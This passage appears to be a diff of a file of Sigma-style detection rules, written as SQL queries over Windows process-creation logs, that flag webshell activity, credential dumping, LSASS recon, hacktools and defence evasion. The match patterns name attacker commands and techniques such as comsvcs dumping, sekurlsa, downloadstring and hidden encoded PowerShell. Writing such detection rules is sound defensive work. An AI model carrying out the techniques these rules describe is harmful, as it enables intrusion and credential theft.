"critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\') AND (IntegrityLevel = 'System' OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%comsvcs%' ESCAPE '\\') OR (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\' AND CommandLine LIKE '% -m%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% user %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% localgroup %' ESCAPE '\\' AND CommandLine LIKE '% administrators %' ESCAPE '\\' AND CommandLine LIKE '%/add%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\adfind.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Nanodump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '%reg save %' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% sekurlsa%' ESCAPE '\\' OR CommandLine LIKE '%.dmp full%' ESCAPE '\\' OR CommandLine LIKE '%process call create%' ESCAPE '\\' OR CommandLine LIKE '%whoami /priv%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2019_1388.yml" + "filename": "proc_creation_win_webshell_hacking.yml" }, { - "title": "Suspicious Outlook Child Process", - "id": "208748f7-881d-47ac-a29c-07ea84bf691d", + "title": "Remote Access Tool - AnyDesk Silent Installation", + "id": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", "status": "test", - "description": "Detects a suspicious process spawning from an Outlook process.", - "author": "Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team", + "description": "Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.", + "author": "Ján Trenčanský", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate deployment of AnyDesk" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%--install%' ESCAPE '\\' AND CommandLine LIKE '%--start-with-win%' ESCAPE '\\' AND CommandLine LIKE '%--silent%' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_outlook_susp_child_processes.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_silent_install.yml" }, { - "title": "Parent in Public Folder Suspicious Process", - "id": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", - "status": "experimental", - "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", + "title": "Suspicious HWP Sub Processes", + "id": "023394c4-29d5-46ab-92b8-6a534c6f447b", + "status": "test", + "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.initial_access", + "attack.t1566.001", + "attack.execution", + "attack.t1203", + "attack.t1059.003", + "attack.g0032" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%wscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%cscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%mshta.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Hwp.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\gbb.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_execution_from_public_folder_as_parent.yml" + "filename": "proc_creation_win_hwp_exploits.yml" }, { - "title": "Potential Dridex Activity", - "id": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", - "status": "stable", - "description": "Detects potential Dridex acitvity via specific process patterns", - "author": "Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Uninstall Sysinternals Sysmon", + "id": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", + "status": "test", + "description": "Detects the removal of Sysmon, which could be a potential attempt at defense evasion", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055", - "attack.discovery", - "attack.t1135", - "attack.t1033" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') AND NOT (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '% -s %' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.dll%' ESCAPE '\\'))) OR (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' AND CommandLine LIKE '% /all%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% view%' ESCAPE '\\')))))" + "attack.t1562.001" ], - "filename": "proc_creation_win_malware_dridex.yml" - }, - { - "title": "Suspicious Program Names", - "id": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", - "status": "test", - "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", - "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate tools that accidentally match on the searched patterns" + "Legitimate administrators might use this command to remove Sysmon for debugging purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\CVE-202%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CVE202%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\poc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact\\_protected.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact32big.exe' ESCAPE '\\' OR NewProcessName LIKE '%obfuscated.exe' ESCAPE '\\' OR NewProcessName LIKE '%obfusc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\meterpreter' ESCAPE '\\') OR (CommandLine LIKE '%inject.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CVE%' ESCAPE '\\' OR CommandLine LIKE '%pupy.ps1%' ESCAPE '\\' OR CommandLine LIKE '%payload.ps1%' ESCAPE '\\' OR CommandLine LIKE '%beacon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%PowerView.ps1%' ESCAPE '\\' OR CommandLine LIKE '%bypass.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfuscated.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfusc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfus.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfs.ps1%' ESCAPE '\\' OR CommandLine LIKE '%evil.ps1%' ESCAPE '\\' OR CommandLine LIKE '%MiniDogz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\_enc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\shell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\rshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%revshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av\\_test.ps1%' ESCAPE '\\' OR CommandLine LIKE '%adrecon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PowerUp\\_%' ESCAPE '\\' OR CommandLine LIKE '%powerup.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\a.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\p.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Hound.ps1%' ESCAPE '\\' OR CommandLine LIKE '%encode.ps1%' ESCAPE '\\' OR CommandLine LIKE '%powercat.ps1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-u%' ESCAPE '\\' OR CommandLine LIKE '%/u%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_progname.yml" + "filename": "proc_creation_win_sysinternals_sysmon_uninstall.yml" }, { - "title": "Potential Conti Ransomware Database Dumping Activity", - "id": "2f47f1fd-0901-466e-a770-3b7092834a1b", + "title": "Invoke-Obfuscation Via Use MSHTA", + "id": "ac20ae82-8758-4f38-958e-b44a3140ca88", "status": "test", - "description": "Detects a command used by conti to dump database", - "author": "frack113", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.collection", - "attack.t1005" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' OR (CommandLine LIKE '%sqlcmd %' ESCAPE '\\' OR CommandLine LIKE '%sqlcmd.exe%' ESCAPE '\\')) AND CommandLine LIKE '% -S localhost %' ESCAPE '\\' AND (CommandLine LIKE '%sys.sysprocesses%' ESCAPE '\\' OR CommandLine LIKE '%master.dbo.sysdatabases%' ESCAPE '\\' OR CommandLine LIKE '%BACKUP DATABASE%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%mshta%' ESCAPE '\\' AND CommandLine LIKE '%vbscript:createobject%' ESCAPE '\\' AND CommandLine LIKE '%.run%' ESCAPE '\\' AND CommandLine LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_conti_ransomware_database_dump.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "PUA - NSudo Execution", - "id": "771d1eb5-9587-4568-95fb-9ec44153a012", + "title": "Add SafeBoot Keys Via Reg Utility", + "id": "d7662ff6-9e97-4596-a61d-9839e32dee8d", "status": "experimental", - "description": "Detects the use of NSudo tool for command execution", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate use by administrators" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\NSudo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NSudoLC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NSudoLG.exe' ESCAPE '\\') OR OriginalFileName IN ('NSudo.exe', 'NSudoLC.exe', 'NSudoLG.exe')) AND (CommandLine LIKE '%-U:S %' ESCAPE '\\' OR CommandLine LIKE '%-U:T %' ESCAPE '\\' OR CommandLine LIKE '%-U:E %' ESCAPE '\\' OR CommandLine LIKE '%-P:E %' ESCAPE '\\' OR CommandLine LIKE '%-M:S %' ESCAPE '\\' OR CommandLine LIKE '%-M:H %' ESCAPE '\\' OR CommandLine LIKE '%-U=S %' ESCAPE '\\' OR CommandLine LIKE '%-U=T %' ESCAPE '\\' OR CommandLine LIKE '%-U=E %' ESCAPE '\\' OR CommandLine LIKE '%-P=E %' ESCAPE '\\' OR CommandLine LIKE '%-M=S %' ESCAPE '\\' OR CommandLine LIKE '%-M=H %' ESCAPE '\\' OR CommandLine LIKE '%-ShowWindowMode:Hide%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\' AND (CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nsudo.yml" + "filename": "proc_creation_win_reg_add_safeboot.yml" }, { - "title": "DLL Sideloading by Microsoft Defender", - "id": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", + "title": "PUA - Seatbelt Execution", + "id": "38646daa-e78f-4ace-9de0-55547b2d30da", "status": "experimental", - "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.discovery", + "attack.t1526", + "attack.t1087", + "attack.t1083" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MpCmdRun.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Seatbelt.exe' ESCAPE '\\' OR OriginalFileName = 'Seatbelt.exe' OR Description = 'Seatbelt' OR (CommandLine LIKE '% DpapiMasterKeys%' ESCAPE '\\' OR CommandLine LIKE '% InterestingProcesses%' ESCAPE '\\' OR CommandLine LIKE '% InterestingFiles%' ESCAPE '\\' OR CommandLine LIKE '% CertificateThumbprints%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumBookmarks%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumHistory%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumPresence%' ESCAPE '\\' OR CommandLine LIKE '% CloudCredentials%' ESCAPE '\\' OR CommandLine LIKE '% CredEnum%' ESCAPE '\\' OR CommandLine LIKE '% CredGuard%' ESCAPE '\\' OR CommandLine LIKE '% FirefoxHistory%' ESCAPE '\\' OR CommandLine LIKE '% ProcessCreationEvents%' ESCAPE '\\')) OR ((CommandLine LIKE '% -group=misc%' ESCAPE '\\' OR CommandLine LIKE '% -group=remote%' ESCAPE '\\' OR CommandLine LIKE '% -group=chromium%' ESCAPE '\\' OR CommandLine LIKE '% -group=slack%' ESCAPE '\\' OR CommandLine LIKE '% -group=system%' ESCAPE '\\' OR CommandLine LIKE '% -group=user%' ESCAPE '\\' OR CommandLine LIKE '% -group=all%' ESCAPE '\\') AND CommandLine LIKE '% -outputfile=%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_mpcmdrun_dll_sideload_defender.yml" + "filename": "proc_creation_win_pua_seatbelt.yml" }, { - "title": "Suspicious Minimized MSEdge Start", - "id": "94771a71-ba41-4b6e-a757-b531372eaab6", - "status": "test", - "description": "Detects the suspicious minimized start of MsEdge browser, which can be used to download files from the Internet", + "title": "Findstr LSASS", + "id": "fe63010f-8823-4864-a96b-a7b4a0f7b929", + "status": "experimental", + "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ - "Software that uses MsEdge to download components in the background (see ParentImage, ParentCommandLine)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%start /min msedge%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%lsass%' ESCAPE '\\') OR (CommandLine LIKE '% /i lsass.exe%' ESCAPE '\\' OR CommandLine LIKE '% /i \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe \"lsass%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_browsers_msedge_minimized_download.yml" + "filename": "proc_creation_win_findstr_lsass.yml" }, { - "title": "Suspicious Atbroker Execution", - "id": "f24bcaea-0cd1-11eb-adc1-0242ac120002", - "status": "test", - "description": "Atbroker executing non-deafualt Assistive Technology applications", - "author": "Mateusz Wydra, oscd.community", + "title": "HackTool - CrackMapExec Execution Patterns", + "id": "058f4380-962d-40a5-afce-50207d36d7e2", + "status": "stable", + "description": "Detects various execution patterns of the CrackMapExec pentesting framework", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1047", + "attack.t1053", + "attack.t1059.003", + "attack.t1059.001", + "attack.s0106" ], "falsepositives": [ - "Legitimate, non-default assistive technology applications execution" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%AtBroker.exe' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%animations%' ESCAPE '\\' OR CommandLine LIKE '%audiodescription%' ESCAPE '\\' OR CommandLine LIKE '%caretbrowsing%' ESCAPE '\\' OR CommandLine LIKE '%caretwidth%' ESCAPE '\\' OR CommandLine LIKE '%colorfiltering%' ESCAPE '\\' OR CommandLine LIKE '%cursorscheme%' ESCAPE '\\' OR CommandLine LIKE '%filterkeys%' ESCAPE '\\' OR CommandLine LIKE '%focusborderheight%' ESCAPE '\\' OR CommandLine LIKE '%focusborderwidth%' ESCAPE '\\' OR CommandLine LIKE '%highcontrast%' ESCAPE '\\' OR CommandLine LIKE '%keyboardcues%' ESCAPE '\\' OR CommandLine LIKE '%keyboardpref%' ESCAPE '\\' OR CommandLine LIKE '%magnifierpane%' ESCAPE '\\' OR CommandLine LIKE '%messageduration%' ESCAPE '\\' OR CommandLine LIKE '%minimumhitradius%' ESCAPE '\\' OR CommandLine LIKE '%mousekeys%' ESCAPE '\\' OR CommandLine LIKE '%Narrator%' ESCAPE '\\' OR CommandLine LIKE '%osk%' ESCAPE '\\' OR CommandLine LIKE '%overlappedcontent%' ESCAPE '\\' OR CommandLine LIKE '%showsounds%' ESCAPE '\\' OR CommandLine LIKE '%soundsentry%' ESCAPE '\\' OR CommandLine LIKE '%stickykeys%' ESCAPE '\\' OR CommandLine LIKE '%togglekeys%' ESCAPE '\\' OR CommandLine LIKE '%windowarranging%' ESCAPE '\\' OR CommandLine LIKE '%windowtracking%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingtimeout%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingzorder%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%cmd.exe /Q /c % 1> \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > %\\\\Temp\\\\% 2>&1' ESCAPE '\\') AND (CommandLine LIKE '%powershell.exe -exec bypass -noni -nop -w 1 -C \"%' ESCAPE '\\' OR CommandLine LIKE '%powershell.exe -noni -nop -w 1 -enc %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_atbroker.yml" + "filename": "proc_creation_win_hktl_crackmapexec_execution_patterns.yml" }, { - "title": "HackTool - Htran/NATBypass Execution", - "id": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", + "title": "Taskmgr as LOCAL_SYSTEM", + "id": "9fff585c-c33e-4a86-b3cd-39312079a65f", "status": "experimental", - "description": "Detects exeuctable names or flags used by Htran or Htran-like tools (e.g. NATBypass)", + "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090", - "attack.s0040" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\htran.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lcx.exe' ESCAPE '\\') OR (CommandLine LIKE '%.exe -tran %' ESCAPE '\\' OR CommandLine LIKE '%.exe -slave %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_htran_or_natbypass.yml" + "filename": "proc_creation_win_taskmgr_localsystem.yml" }, { - "title": "Potential Recon Activity Using DriverQuery.EXE", - "id": "9fc3072c-dc8f-4bf7-b231-18950000fadd", + "title": "Suspicious Processes Spawned by WinRM", + "id": "5cc2cda8-f261-4d88-a2de-e9e193c86716", "status": "experimental", - "description": "Detect usage of the \"driverquery\" utility to perform reconnaissance on installed drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious processes including shells spawnd from WinRM host process", + "author": "Andreas Hunkeler (@Karneades), Markus Neis", "tags": [ - "attack.discovery" + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Unknown" + "Legitimate WinRM usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_driverquery_recon.yml" + "filename": "proc_creation_win_winrm_susp_child_process.yml" }, { - "title": "Renamed PsExec Service Execution", - "id": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", - "status": "experimental", - "description": "Detects suspicious launch of a renamed version of the 